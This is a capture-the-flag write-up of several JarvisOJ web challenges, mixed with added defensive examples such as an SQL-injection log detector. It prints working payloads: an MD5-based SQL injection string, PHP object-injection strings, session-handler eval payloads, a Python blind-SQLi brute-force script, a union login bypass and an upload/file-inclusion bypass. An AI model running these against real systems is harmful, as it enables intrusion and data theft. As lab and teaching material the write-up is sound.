JarvisOJ Platform Web Challenges (Simple Part) Writeup

Source: Internet
Author: User
Tags: eval, file upload, json, php, code, php framework, php source code, phpinfo, sql injection

After the page is accessed, the page displays:

Please use the port visit this site.

When I first saw this I thought it meant visiting port 51 of the site, but the site is clearly served on port 32770, so I set it aside. It turned out that the request has to originate from local port 51. The payload is as follows:

curl --local-port 51 http://web.jarvisoj.com:32770/
Finally, we get the flag.

API call

Topic Link: http://web.jarvisoj.com:9882/

Topic Tip:

Please try to get the flag value from /home/ctf/flag.txt on the target machine.

After opening the link, view the web page source:

function send() {
    evil_input = document.getElementById("evil-input").value;
    var xhr = XHR();
    xhr.open("POST", "/api/v1.0/try", true);
    xhr.onreadystatechange = function () {
        if (xhr.readyState == 4 && xhr.status == 201) {
            data = JSON.parse(xhr.responseText);
            tip_area = document.getElementById("tip-area");
            tip_area.value = data.task.search + data.task.value;
        }
    };
    xhr.setRequestHeader("Content-Type", "application/json");
    xhr.send('{"search":"' + evil_input + '","value":"own"}');
}
This page only sends a request to the backend; what is entered on the front end does not matter.

The response returned by the backend shows:

HTTP/1.0 201 CREATED
Content-Type: application/json
Content-Length: 86
Server: Werkzeug/0.9.4 Python/2.7.6
Date: Wed, Oct 2016 05:34:05 GMT
This only tells us that the backend is written in Python; there is no other information.

In the end it turned out to be a so-called XXE vulnerability. For the concepts behind XXE, refer to the article on the XXE vulnerability in the PHP Slim framework, which explains the principle in great detail.

Knowing that this is an XXE vulnerability, the final payload is as follows:


This was the first time I had heard of this vulnerability; when I have time I will study it and write a detailed article explaining it.

Reference: How to implement an XXE (XML external entity injection) vulnerability with Python

On the harm of XXE, refer to the article "Know the attack to know how to defend: XXE vulnerability attacks".

Login

Topic Link: http://web.jarvisoj.com:32772/

Topic Tip:

You need a password to get the flag.

On the login page there is only a password input box and no other hints. Entering a random password shows "wrong password". This looks like SQL injection, but typing illegal characters gives no sign of filtering: it always shows "wrong password". Finally, a hint was found by looking at the response packet:

Hint: "select * from `admin` where password='".md5($pass,true).""
Knowing that md5($pass, true) is the key, a search leads to this article. Entering the string ffifdyop as the password gives the final result.
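To show why md5($pass, true) matters, here is an added example (not code from the challenge or this writeup) that rebuilds the hinted query in Python with the raw 16-byte digest spliced in unescaped, approximates MySQL's string-to-number coercion, and contrasts it with comparing the digest in application code. The function names and the coercion model are assumptions.

```python
import hashlib
import hmac
import re

# Added example, not part of the challenge source. It reproduces the hinted
# pattern  "... where password='".md5($pass, true)."'"  to show why a raw
# (binary) digest spliced into SQL can turn the WHERE clause into a tautology.


def raw_md5_query(password: str) -> str:
    """Build the query the way the hint does: raw 16-byte digest, no escaping."""
    raw = hashlib.md5(password.encode()).digest()
    return "select * from `admin` where password='" + raw.decode("latin-1") + "'"


def mysql_truthy(text: str) -> bool:
    """Approximate MySQL's string-to-number coercion in a boolean context:
    only a leading numeric prefix counts; anything else becomes 0 (false)."""
    m = re.match(r"\s*[+-]?(\d+\.?\d*|\.\d+)", text)
    return m is not None and float(m.group(1)) != 0.0


def digest_breaks_query(password: str) -> bool:
    """True when the raw digest starts with 'or' followed by a truthy string
    and no further quote, i.e. the clause becomes  password='' or '6...'."""
    raw = hashlib.md5(password.encode()).digest().decode("latin-1")
    if not raw.startswith("'or'"):
        return False
    rest = raw[4:]
    return "'" not in rest and mysql_truthy(rest)


def safe_check(password: str, stored_hex: str) -> bool:
    """Mitigation: fetch the stored digest by username and compare in code,
    never interpolate digest bytes into SQL. (MD5 is kept only to match the
    challenge; a real system should use a slow password hash.)"""
    digest = hashlib.md5(password.encode()).hexdigest()
    return hmac.compare_digest(digest, stored_hex)


if __name__ == "__main__":
    for pw in ("password", "ffifdyop"):
        print(repr(raw_md5_query(pw)), "->", digest_breaks_query(pw))
```

For ffifdyop the digest begins with the bytes 'or'6, so the clause reads password='' or '6...', and the string '6...' coerces to 6, which is true.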

The Secret of the God Shield Bureau

Topic Link: http://web.jarvisoj.com:32768/

Topic Tip:

There is a secret entrance to the internal network of the Shield Bureau; can you find the Shield Bureau's secret through the vulnerability?

Opening the link gives a picture. Capturing the traffic with Burp, I found that along the way it visits the URL http://web.jarvisoj.com:32768/showimg.php?img=c2hpZWxkLnBocA==. This looks like a file read, with the filename base64-encoded.

Read the contents of the showimg.php:

<?php
$f = $_GET['img'];
if (!empty($f)) {
    $f = base64_decode($f);
    if (stripos($f, '..') === false && stripos($f, '/') === false && stripos($f, '\\') === false
        && stripos($f, 'pctf') === false) {
        readfile($f);
    } else {
        echo "File not found!";
    }
}
?>
Ordinary content; nothing related to the flag.

Try to read the index.php source:

<?php
require_once('shield.php');
$x = new Shield();
isset($_GET['class']) && $g = $_GET['class'];
if (!empty($g)) {
    $x = unserialize($g);
}
echo $x->readfile();
?>
index.php also has nothing flag-related, but it reads the value of the class parameter and does not filter it before unserializing it.

Read shield.php:

<?php
//flag is in pctf.php
class Shield {
    public $file;
    function __construct($filename = '') {
        $this->file = $filename;
    }

    function readfile() {
        if (!empty($this->file) && stripos($this->file, '..') === false
            && stripos($this->file, '/') === false && stripos($this->file, '\\') == false) {
            return @file_get_contents($this->file);
        }
    }
}
?>
shield.php says the flag is in pctf.php. Combined with the index.php source, we can get the flag if $x is an instance of the Shield class whose file attribute is pctf.php, but the code as it stands cannot produce that directly. After thinking about it for a long time I consulted 40huo, and learned that you need to set up a local environment and serialize such an instance there.

index.php
<?php
require_once('shield.php');
$x = new Shield();
echo serialize($x);
?>
shield.php

<?php
//flag is in pctf.php
class Shield {
    public $file;
    function __construct($filename = 'pctf.php') {
        $this->file = $filename;
    }
    function readfile() {
        if (!empty($this->file) && stripos($this->file, '..') === false
            && stripos($this->file, '/') === false && stripos($this->file, '\\') == false) {
            return @file_get_contents($this->file);
        }
    }
}
?>
The key is that $filename is assigned pctf.php during initialization:

function __construct($filename = 'pctf.php') {
    $this->file = $filename;
}
The resulting serialized value is:

O:6:"Shield":1:{s:4:"file";s:8:"pctf.php";}
Finally, access the URL http://web.jarvisoj.com:32768/index.php?class=O:6:%22Shield%22:1:{s:4:%22file%22;s:8:%22pctf.php%22;}
The page returns:

<?php
//Ture FLAG:PCTF{W3LCOME_TO_SHI3LD_SECRET_AR3A}
//Fake flag:
echo "FLAG:PCTF{I_4M_NOT_FL4G}"
?>
PHPINFO

Topic Address: http://web.jarvisoj.com:32784/

Visiting the website, the page shows:

<?php
//A webshell is wait for you
ini_set('session.serialize_handler', 'php');
session_start();
class OowoO
{
    public $mdzz;
    function __construct()
    {
        $this->mdzz = 'phpinfo();';
    }

    function __destruct()
    {
        eval($this->mdzz);
    }
}
if (isset($_GET['phpinfo']))
{
    $m = new OowoO();
}
else
{
    highlight_string(file_get_contents('index.php'));
}

Seeing ini_set('session.serialize_handler', 'php') in the PHP code tells you that this challenge is about PHP session serialization. For background on PHP sessions you can refer to my article; session serialization is not described here.

To trigger the vulnerability, a value serialized by the php_serialize handler has to be written into the server-side session; the PHP engine then deserializes it with the php handler when index.php is accessed. The challenge provides no direct way to write the session, but Session Upload Progress can do it: when uploading a file, if the POST contains a variable named PHP_SESSION_UPLOAD_PROGRESS, the filename is stored in the session. The upload page is written as follows:

<form action="http://121.42.149.60/68b329da9893e34099c7d8ad5cb9c940/index.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="123" />
<input type="file" name="file" />
<input type="submit" />
</form>
The uploaded filename is saved at the end of the session data.

Below is a test of how PHP_SESSION_UPLOAD_PROGRESS is written.

Locally, you need to assign a value to $mdzz and then have the eval() in the destructor execute the code in $mdzz.

Create a myindex.php locally:

<?php
ini_set('session.serialize_handler', 'php_serialize');
session_start();
class OowoO
{
    public $mdzz = 'need to set method';
    function __construct()
    {
        $this->mdzz = 'phpinfo();';  // replace with the code to be serialized
    }

    function __destruct()
    {
        echo $this->mdzz;
    }
}
$obj = new OowoO();
echo serialize($obj);
First set $mdzz = 'echo "spoock";'. The serialized result is O:5:"OowoO":1:{s:4:"mdzz";s:14:"echo "spoock";";}. The filename then needs to be set to |O:5:"OowoO":1:{s:4:"mdzz";s:14:"echo "spoock";";}; because the double quotes are escaped, the actual filename is |O:5:\"OowoO\":1:{s:4:\"mdzz\";s:14:\"echo \"spoock\";\";}. The final test result is:


You can see that the final output is spoock, which shows that the test above succeeded.

The next step is to get the flag.

Get the project path:

Get the file path via dirname

Set $mdzz = 'print_r(dirname(__FILE__));'
The serialized result is O:5:"OowoO":1:{s:4:"mdzz";s:27:"print_r(dirname(__FILE__));";}
The filename is set to |O:5:\"OowoO\":1:{s:4:\"mdzz\";s:27:\"print_r(dirname(__FILE__));\";}
The result is as follows:


The project path is /opt/lampp/htdocs

Get the file list

Get the list of files via scandir

Set $mdzz = 'print_r(scandir("/opt/lampp/htdocs"));'
The serialized result is O:5:"OowoO":1:{s:4:"mdzz";s:38:"print_r(scandir("/opt/lampp/htdocs"));";}
The filename is set to |O:5:\"OowoO\":1:{s:4:\"mdzz\";s:38:\"print_r(scandir(\"/opt/lampp/htdocs\"));\";}
The result is:


The listing contains here_1s_7he_fl4g_but_you_cannot_see.php.

Read the contents of the file:

Read the file contents via file_get_contents

Set $mdzz = 'print_r(file_get_contents("/opt/lampp/htdocs/here_1s_7he_fl4g_but_you_cannot_see.php"));'
The serialized result is O:5:"OowoO":1:{s:4:"mdzz";s:88:"print_r(file_get_contents("/opt/lampp/htdocs/here_1s_7he_fl4g_but_you_cannot_see.php"));";}
The filename is set to |O:5:\"OowoO\":1:{s:4:\"mdzz\";s:88:\"print_r(file_get_contents(\"/opt/lampp/htdocs/here_1s_7he_fl4g_but_you_cannot_see.php\"));\";}

The result is:


Finally, we get the flag.
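To make the serialized values used in the Shield section and in this section concrete, here is an added example (not code from the challenge or this writeup): a minimal PHP serializer in Python that reproduces the s:N byte counts shown above, plus the two session record layouts written by the php_serialize and php handlers. The class name PhpObject, the helper names and the simplified session layout are assumptions.

```python
# Added example, not code from the challenge or this writeup: a minimal PHP
# serializer for the value kinds used on this page. It shows (a) where the s:N
# counts such as 14, 27, 38 and 88 come from (N is a byte length; a wrong N is
# rejected by unserialize) and (b) how one session record is laid out by the
# php_serialize handler that wrote it versus the php handler that reads it.


class PhpObject:
    """A PHP object with public properties, e.g. PhpObject("Shield", file="pctf.php")."""

    def __init__(self, cls: str, **props):
        self.cls, self.props = cls, props


def php_serialize(value) -> str:
    if isinstance(value, bool):
        return "b:%d;" % int(value)
    if isinstance(value, int):
        return "i:%d;" % value
    if isinstance(value, str):
        return 's:%d:"%s";' % (len(value.encode()), value)  # bytes, not characters
    if isinstance(value, dict):
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return "a:%d:{%s}" % (len(value), body)
    if isinstance(value, PhpObject):
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.props.items())
        return 'O:%d:"%s":%d:{%s}' % (len(value.cls), value.cls, len(value.props), body)
    raise TypeError("unsupported type %r" % type(value))


def record_php_serialize(session: dict) -> str:
    """What session.serialize_handler=php_serialize writes: $_SESSION as one array."""
    return php_serialize(session)


def record_php(session: dict) -> str:
    """What session.serialize_handler=php writes: key|value pairs, '|' is the delimiter."""
    return "".join("%s|%s" % (k, php_serialize(v)) for k, v in session.items())


def php_handler_split(record: str):
    """How the php handler reads a record: the text before the first '|' is the
    key and the remainder is unserialized. A php_serialize record whose data
    contains '|' is therefore parsed into a value the writer never intended."""
    key, _, rest = record.partition("|")
    return key, rest


if __name__ == "__main__":
    # Simplified: the real upload-progress entry is a nested array holding the filename.
    name = "|" + php_serialize(PhpObject("OowoO", mdzz='echo "spoock";'))
    record = record_php_serialize({"upload_progress_123": name})
    print(record, php_handler_split(record), sep="\n")
```

The mitigation follows from (b): keep session.serialize_handler identical for every script that touches the same session store, and treat unserialize() of any user-influenced data as code execution.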

Simple injection

It's a simple injection, everybody try?

Topic entrance: http://web.jarvisoj.com:32787/

I still prefer doing SQLi challenges.

Visiting the page gives a login page. Checking the response headers and the page with Burp for hints, this is indeed a common login SQL injection.

Common kinds of login vulnerability

Validating user name and password at the same time:

$sql = "select * from users where username='$username' and password='$password'";
$result = mysql_query($sql);
if ($result) {
    echo "login success";
} else {
    echo "login failed";
}
Validating the user name and password step by step:

$sql = "select password from users where username='$username'";
$result = mysql_query($sql);
if ($result) {
    $row = mysql_fetch_row($result);
    $query_password = $row[0];
    // transform the input $password (e.g. hash it)
    $input_password = modify($password);
    if ($input_password == $query_password) {
        echo "login success";
    } else {
        echo "password error";
    }
} else {
    echo "user does not exist";
}
The challenge

Trying username=admin&password=123456, the page returns "password error".
Trying username=user&password=123456, the page returns "username error".
So the authentication method is step-by-step validation of user name and password.

Verifying the idea

Using username=admin'#&password=123456, the page returns a password error, showing that the backend does not filter # or '.
Using username=admin' or 1=1#&password=123456, the page returns a username error, which means some part of admin' or 1=1# is filtered on the backend. The filtered content may or may not be the space.
Using username=user'/**/or/**/1=1#&password=123456, the page returns a password error, showing that the injected SQL executes, which also shows the backend only filters spaces.
Summing up: username is injectable and only spaces are filtered, so this is a blind injection.

PoC

The whole PoC is an error-based blind injection done step by step; the specific method can be referred to in the article.

Find the table: username=user'/**/or/**/exists(select/**/*/**/from/**/admin)#&password=123456 returns a password error, so the database has an admin table.
Find the fields: username=user'/**/or/**/exists(select/**/username,password/**/from/**/admin)#&password=123456 returns a password error, so the admin table has username and password fields.
username=user'/**/or/**/exists(select/**/count(*)/**/from/**/admin)#&password=123456 returns a password error; the admin table has only one record, which makes things easy.
Get the password length: username=user'/**/or/**/(select/**/length(password)/**/from/**/admin)>10#&password=123456. By binary search the password field is found to be 32 characters long, which suggests MD5 is used.
After determining the password length, the next step is to brute-force it with Python.

import requests


def get_data():
    result = ""
    url = 'http://web.jarvisoj.com:32787/login.php'
    payload = {
        "username": 'xx',
        "password": 1,
    }
    # boolean condition on the i-th character of the password; /**/ replaces spaces
    username_template = "'/**/or/**/ascii(substr((select/**/password/**/from/**/admin),{0},1))>{1}#"
    # ordered by ASCII value: the loop stops at the first character for which
    # ">" is false, which is the character itself
    chars = '0123456789@ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz'
    for i in range(1, 33):
        for char in chars:
            char_ascii = ord(char)
            username = username_template.format(i, char_ascii)
            payload['username'] = username
            response = requests.post(url, data=payload)
            length = len(response.text)
            # print(length)
            # the returned length is only ever 1191 or 1192
            if length > 1191:
                print(char)
                result += char
                break
    print(result)


get_data()
Finally, the value of password is 334CFB59C9D74849801D5ACDCFDAADC3.

Once you have the plaintext of the password, entering it gives the flag.

PoC2

Once the password length is known to be 32, i.e. MD5 is used, the following PoC can be used:

username=user'/**/union/**/select/**/'c4ca4238a0b923820dcc509a6f75849b'#&password=1
This way you get the flag directly.
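From the defender's side, the probes above have a recognisable shape: /**/ in place of spaces, a quote followed by or, exists(select ...), ascii(substr(...)) and union select. Here is an added example (not part of the writeup) that scans constructed log lines for those indicators; the log format, with the POST body as the last quoted field, and the indicator names are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Added example, not part of the writeup: detection logic for the probe style
# used above, where /**/ replaces spaces and # (%23) truncates the query. The
# log lines are constructed; the last quoted field stands for the POST body,
# which a real access log only carries when body logging is enabled.

SAMPLE_LOG = """\
10.0.0.5 - - [19/Oct/2016:05:34:05 +0000] "POST /login.php HTTP/1.1" 200 1191 "username=admin&password=123456"
10.0.0.5 - - [19/Oct/2016:05:34:06 +0000] "POST /login.php HTTP/1.1" 200 1192 "username=user'/**/or/**/1=1%23&password=123456"
10.0.0.5 - - [19/Oct/2016:05:34:07 +0000] "POST /login.php HTTP/1.1" 200 1191 "username=user'/**/or/**/exists(select/**/*/**/from/**/admin)%23&password=123456"
10.0.0.5 - - [19/Oct/2016:05:34:08 +0000] "POST /login.php HTTP/1.1" 200 1191 "username=user'/**/or/**/ascii(substr((select/**/password/**/from/**/admin),1,1))>51%23&password=123456"
10.0.0.5 - - [19/Oct/2016:05:34:09 +0000] "POST /login.php HTTP/1.1" 200 1191 "username=user'/**/union/**/select/**/'c4ca4238a0b923820dcc509a6f75849b'%23&password=1"
"""

COMMENT = re.compile(r"/\*.*?\*/", re.S)  # inline comments used as whitespace
BODY = re.compile(r'"([^"]*)"\s*$')       # last quoted field of the constructed format

# Matched against the URL-decoded, comment-stripped, lower-cased body.
PATTERNS = {
    "quote-then-or": re.compile(r"'\s*or\s+\S"),
    "exists-subquery": re.compile(r"\bexists\s*\(\s*select\b"),
    "char-by-char": re.compile(r"\bascii\s*\(\s*substr\s*\("),
    "union-select": re.compile(r"\bunion\s+select\b"),
}


def normalize(body: str) -> str:
    """URL-decode, turn every /*...*/ into one space, fold case."""
    return COMMENT.sub(" ", unquote_plus(body)).lower()


def scan_line(line: str) -> list:
    """Return the indicator names that fire on one log line (empty if none)."""
    m = BODY.search(line)
    if not m:
        return []
    body = m.group(1)
    hits = ["comment-as-space"] if "/**/" in unquote_plus(body) else []
    norm = normalize(body)
    hits += [name for name, pat in PATTERNS.items() if pat.search(norm)]
    return hits


def scan_log(text: str) -> dict:
    """Map 1-based line number -> indicators, omitting clean lines."""
    result = {}
    for n, line in enumerate(text.splitlines(), 1):
        hits = scan_line(line)
        if hits:
            result[n] = hits
    return result
```

Comment stripping is what makes the space filter irrelevant for detection: once /**/ is folded to whitespace, the ordinary keyword patterns apply.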

Easy Gallery

"There is no protection is a loophole can not solve, if there is, then ..."

Topic entrance: http://web.jarvisoj.com:32785/

Looking at the challenge, it is an upload challenge, so upload bypasses will be needed.


File Upload

On uploading, I found that the backend does not judge only by the file suffix but also checks the file's MIME type, so a picture Trojan has to be uploaded.

File browsing

The picture Trojan can be uploaded; the remaining step is to browse to the image. After uploading, the whole image-browsing flow is as follows:


After uploading you get the image ID; entering the image ID and the image type in view lets you browse the picture, and the picture's actual link turns out to be http://web.jarvisoj.com:32785/uploads/picture id.jpg

Connection Trojan

Seeing this, I thought it was an ordinary file Trojan that China Chopper could connect to directly, but it could not connect; the backend blocks the chopper. Trying to trigger the Trojan without the chopper did not work either: uploads/picture id.jpg is not executed.

file contains

Since the chopper cannot be used, a different method is needed.

When you open the Submit and View pages, the links accessed are:

http://web.jarvisoj.com:32785/index.php?page=submit
http://web.jarvisoj.com:32785/index.php?page=view
There may be a file inclusion vulnerability here; try:

http://web.jarvisoj.com:32785/index.php?page=view'
The page errors:

Warning: fopen(view'.php): failed to open stream: No such file or directory in /opt/lampp/htdocs/index.php on line 24
No such file!
This shows that a file inclusion vulnerability does exist.

Reading pictures

When a file is read, the backend appends the suffix .php to the page parameter, so %00 is needed to truncate it.

Trying to read the uploaded file through the file inclusion vulnerability:

yun_qi_img/picture id.jpg%00
The page shows "you should does this!".

The backend filters <?php phpcode ?> in the uploaded content, so a new bypass is needed. This challenge is somewhat similar to the Baidu CTF upload challenge; consider using <script language="php">phpcode;</script> to execute PHP code.

PoC

The final PHP code is written as:

<script language="php">phpinfo();</script>
Make the PHP code above into a picture Trojan, then read the picture through the file inclusion vulnerability:

yun_qi_img/picture id.jpg%00
